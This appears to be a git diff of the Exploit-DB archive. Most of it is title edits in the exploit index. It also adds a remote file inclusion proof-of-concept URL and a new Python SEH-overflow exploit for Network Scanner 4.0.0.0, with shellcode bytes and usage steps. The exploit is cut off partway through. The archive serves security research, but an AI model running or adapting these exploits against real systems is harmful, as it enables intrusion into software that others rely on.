+34143,platforms/windows/remote/34143.txt,"XnView 1.97.4 - '.MBM' File Remote Heap Buffer Overflow",2010-06-14,"Mauro Olea",windows,remote,0 34144,platforms/php/webapps/34144.txt,"Joomla! Component com_easygb - 'Itemid' Parameter Cross-Site Scripting",2010-06-08,"L0rd CrusAd3r",php,webapps,0 34145,platforms/unix/dos/34145.txt,"Python 3.2 - 'audioop' Module Memory Corruption",2010-06-14,haypo,unix,dos,0 34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login - Multiple SQL Injections",2010-06-15,"L0rd CrusAd3r",php,webapps,0 @@ -35570,7 +35570,7 @@ id,file,description,date,author,platform,type,port 39221,platforms/win_x86-64/dos/39221.txt,"Adobe Flash - Use-After-Free When Setting Stage",2016-01-11,"Google Security Research",win_x86-64,dos,0 39222,platforms/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",multiple,remote,0 39223,platforms/php/webapps/39223.txt,"ZeusCart - 'prodid' Parameter SQL Injection",2014-06-24,"Kenny Mathis",php,webapps,0 -39224,platforms/hardware/remote/39224.py,"Fortigate OS Version 4.x < 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22 +39224,platforms/hardware/remote/39224.py,"Fortigate OS 4.x < 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22 39229,platforms/linux/dos/39229.cpp,"Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - ImageRegionReader::ReadIntoBuffer Buffer Overflow",2016-01-12,"Stelios Tsampas",linux,dos,0 39230,platforms/linux/local/39230.c,"Linux Kernel 4.3.3 - 'overlayfs' Privilege Escalation (2)",2016-01-12,halfdog,linux,local,0 39231,platforms/asp/webapps/39231.py,"WhatsUp Gold 16.3 - Unauthenticated Remote Code Execution",2016-01-13,"Matt Buzanowski",asp,webapps,0 @@ -35779,7 +35779,7 @@ id,file,description,date,author,platform,type,port 39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0 39445,platforms/linux/dos/39445.c,"Ntpd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0 39446,platforms/win_x86/local/39446.py,"Microsoft Windows - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win_x86,local,0 -39447,platforms/windows/dos/39447.py,"Network Scanner Version 4.0.0.0 - SEH Crash (PoC)",2016-02-15,INSECT.B,windows,dos,0 +39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - SEH Crash (PoC)",2016-02-15,INSECT.B,windows,dos,0 39448,platforms/php/webapps/39448.txt,"Tiny Tiny RSS - Blind SQL Injection",2016-02-15,"Kacper Szurek",php,webapps,80 39449,platforms/multiple/webapps/39449.txt,"ManageEngine OPutils 8.0 - Multiple Vulnerabilities",2016-02-16,"Kaustubh G. Padwad",multiple,webapps,0 39450,platforms/multiple/webapps/39450.txt,"ManageEngine Network Configuration Management Build 11000 - Privilege Escalation",2016-02-16,"Kaustubh G. Padwad",multiple,webapps,0 @@ -36670,7 +36670,7 @@ id,file,description,date,author,platform,type,port 40558,platforms/php/webapps/40558.txt,"School Full CBT 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0 40559,platforms/php/webapps/40559.txt,"PHP Business Directory - Multiple Vulnerabilities",2016-10-17,larrycompress,php,webapps,0 40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0 -40561,platforms/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload Remote Code Execution",2016-10-17,Metasploit,multiple,remote,0 +40561,platforms/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload / Remote Code Execution",2016-10-17,Metasploit,multiple,remote,0 40562,platforms/windows/local/40562.cpp,"Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)",2016-10-17,"Google Security Research",windows,local,0 40566,platforms/php/webapps/40566.py,"Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)",2016-10-18,"Ahsan Tahir",php,webapps,0 40567,platforms/windows/local/40567.py,"LanSpy 2.0.0.155 - Local Buffer Overflow",2016-10-18,n30m1nd,windows,local,0 @@ -36725,3 +36725,4 @@ id,file,description,date,author,platform,type,port 40627,platforms/windows/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",windows,local,0 40628,platforms/php/webapps/40628.pl,"EC-CUBE 2.12.6 - Server-Side Request Forgery",2016-10-24,Wadeek,php,webapps,0 40629,platforms/hardware/webapps/40629.txt,"Industrial Secure Routers EDR-810 / EDR-G902 / EDR-G903 - Insecure Configuration Management",2016-10-24,"Sniper Pex",hardware,webapps,0 +40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - SEH Local Buffer Overflow",2016-10-25,n30m1nd,windows,local,0 diff --git a/platforms/php/webapps/4670.txt b/platforms/php/webapps/4670.txt index a9d15beca..a72d43a64 100755 --- a/platforms/php/webapps/4670.txt +++ b/platforms/php/webapps/4670.txt @@ -1,6 +1,9 @@ -PHP-CON v1.3 (include.php)Remote File Inclusion Vulnerability +PHP-CON 1.3 - 'include.php' Remote File Inclusion + Script : http://sourceforge.net/project/showfiles.php?group_id=182182 + POC : + /PHP_CON/Exchange/include.php?webappcfg[APPPATH]= Evil Code # milw0rm.com [2007-11-28] diff --git a/platforms/windows/local/40630.py b/platforms/windows/local/40630.py new file mode 100755 index 000000000..c04277170 --- /dev/null +++ b/platforms/windows/local/40630.py @@ -0,0 +1,71 @@ +#!/usr/bin/python +# -*- coding: utf-8 -*- + +### Network Scanner Version 4.0.0.0 - SEH Overflow Exploit by n30m1nd ### + +# Date: 2016-10-21 +# Exploit Author: n30m1nd +# Exploit Title: Network Scanner Version 4.0.0.0 SEH Based Exploit +# Vendor Homepage: http://www.mitec.cz/ +# Software Link: https://www.exploit-db.com/apps/8a419b10772d811ce5eea44cb88ae55b-NetScan.zip +# Version: 4.0.0.0 +# Tested on: Win7 64bit and Win10 64 bit + +# Credits +# ======= +# PoC by: INSECT.B - http://binsect00.tistory.com +# https://www.exploit-db.com/exploits/39447/ +# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better + +# How to +# ====== +# * Run this python script. It will generate an "exploit.txt" file. +# * Copy the contents and, in the program, go to the "TOOLS" tab then click on "Detect IP from hostname" and paste the contents +# * MessageBoxA is called on an infinite loop since the exception handler is triggered all the time + +# Exploit code +# ============ + +import struct + +# MessageBoxA in NetScan.exe => 004042F1 +mbox = ( + "\x25\x41\x41\x41" + "\x41\x25\x32\x32" + "\x32\x32\x50\x68" + "\x70\x77\x6E\x64" + "\x54\x5F\x50\x57" + "\x57\x50\x35\x8E" + "\x60\x60\x55\x35" + "\x7F\x22\x20\x55" + "\x50\xC3" + ) +# JUMP BACK to our shellcode! +nseh = ( + # xor al,51h; Sets the ZF = 0 (We have to be very unlucky for eax to end in 51h) + "\x34\x51" + # jne -32h; Jump if ZF = 0 + "\x75\xCC" + ) +# pop pop ret => 00402E67 +sehh = struct.pack("